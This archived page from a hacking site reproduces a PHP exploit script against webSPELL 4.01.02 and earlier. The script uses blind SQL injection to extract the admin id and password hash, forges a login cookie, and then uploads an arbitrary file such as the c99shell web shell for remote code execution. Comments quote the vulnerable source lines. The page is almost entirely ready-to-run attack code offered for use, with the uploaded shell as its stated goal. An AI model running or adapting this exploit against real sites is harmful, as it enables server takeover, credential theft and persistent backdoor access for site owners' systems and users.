AOH :: HP Unsorted W :: C07-2520.HTM

webSPELL <= 4.01.02 Remote PHP Code Execution Exploit



webSPELL <= 4.01.02 Remote PHP Code Execution Exploit
webSPELL <= 4.01.02 Remote PHP Code Execution Exploit



#!/usr/bin/php
(http://localhost/webspell4.01.02/downloads/c99shell.php) 
#
if($argc < 5)
{
print ("
------   webSPELL <= 4.01.02 Remote PHP Code Execution Exploit   ------
-----------------------------------------------------------------------
PHP conditions: register_globals=On
Credits: DarkFig  
URL: http://www.acid-root.new.fr/ 
-----------------------------------------------------------------------
  Usage: $argv[0] -url <> -file <> [Options]
Params: -url For example http://victim.com/webspell/ 
         -file      The file you wanna upload (c99shell.php...)
Options: -prefix    Table prefix (default=webs)
         -upmatch   The match which returns TRUE for the upload
         -sqlmatch  The match which returns TRUE for the SQL injection
         -proxy     If you wanna use a proxy  
         -proxyauth Basic authentification 
Example: $argv[0] -url http://localhost/webspell/ -file c99shell.php 
-----------------------------------------------------------------------
");exit(1);
}

$url            = getparam('url',1);
$file           = getparam('file',1);
$prfix          = (getparam('prefix')!='')   ? getparam('prefix')   : 'webs';
$match_upload   = (getparam('upmatch')!='')  ? getparam('upmatch')  : '\;URL\=index\.php\?site\=files\&file\=';
$match_blindsql = (getparam('sqlmatch')!='') ? getparam('sqlmatch') : 'site\=profile\&id\=';
$proxy          = getparam('proxy');
$authp          = getparam('proxyauth');

$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if($proxy) $xpl->proxy($proxy);
if($authp) $xpl->proxyauth($authp);

print "\nAdmin id: ";
$userid = blind('userID');

print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));

print "\nLogged in (ws_auth=$userid%3A$passwd)";
$xpl->addcookie("ws_auth",$userid."%3A".$passwd);


# File upload vulnerability
#
# +files.php
# |
# 42. $action = $_GET['action'];
# 43. if($action=="save") {
# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3"));
# 46. $upfile = $_FILES[upfile];
# 69. $filepath = "./downloads/";
# 71. $des_file = $filepath.$upfile[name];
# 72. if(!file_exists($des_file)) {
# 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) {
#
print "\nTrying to upload the malicious file";
$frmdt = array(frmdt_url => $url.'index.php?site=files&action=save',
               "fileurl" => 1,
               "upfile"  => array(frmdt_filename => basename($file),
                                  frmdt_content  => file_get_contents($file)));

$xpl->formdata($frmdt);
if(preg_match("#$match_upload#si",$xpl->getcontent())) print "\nDone";
else print "\nFailed";
print " (${url}downloads/".basename($file).")\n";


# Simple blind SQL injection (register_globals=On)
#
# +members.php
# |
# 31. if($_GET['action']=="show") {
# 32. if($_GET['squadID']) {
# 33. $getsquad = 'WHERE squadID="'.$_GET['squadID'].'"';
# 34. }
# 36. $ergebnis=safe_query("SELECT * FROM ".PREFIX."squads ".$getsquad." ORDER BY sort");
#
function blind($field)
{
	global $prfix,$xpl,$url,$match_blindsql;
	$d=0; $v='';
=09
	if(!eregi('p',$field)) { $b=47;$c=57; } # 0-9
	else                   { $b=47;$c=70; } # 0-9a-z
=09
	while(TRUE)
	{
		$d++;
		for($e=$b;$e<=$c;$e++)
		{
		    if($e==47) $f='NULL';
		    else $f=$e;

		    $sql = "WHERE SUBSTR((SELECT $field FROM ${prfix}_user WHERE userID="
	                  ."(SELECT userID FROM ${prfix}_user_groups WHERE files=1 LIMIT 1)"
	                  ." LIMIT 1),$d,1)=CHAR($f)";
	       
	            $xpl->get($url."index.php?site=members&action=show&getsquad=".urlencode($sql));
	            if(preg_match("#$match_blindsql#",$xpl->getcontent(),$matches))
                    {
	        	if($e==47)
	        	{
	        	    return $v;
	        	}
	        	else
	        	{
	        	    print strtolower(chr($f));
	        	    $v .= chr($f);
	        	    break;
	        	}
                    }
		}
	}
}

function getparam($param,$opt='')
{
	global $argv;
	foreach($argv as $value => $key)
	{
		if($key == '-'.$param) return $argv[$value+1];
	}
	if($opt) exit("\n-$param parameter required");
	else return;
}

if(!function_exists('file_get_contents')) {
	function file_get_contents($file)
	{
		$handle  = fopen($file, "r");
		$content = fread($fd, filesize($file));
		fclose($handle);
		return $content;
	}
}

?>

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.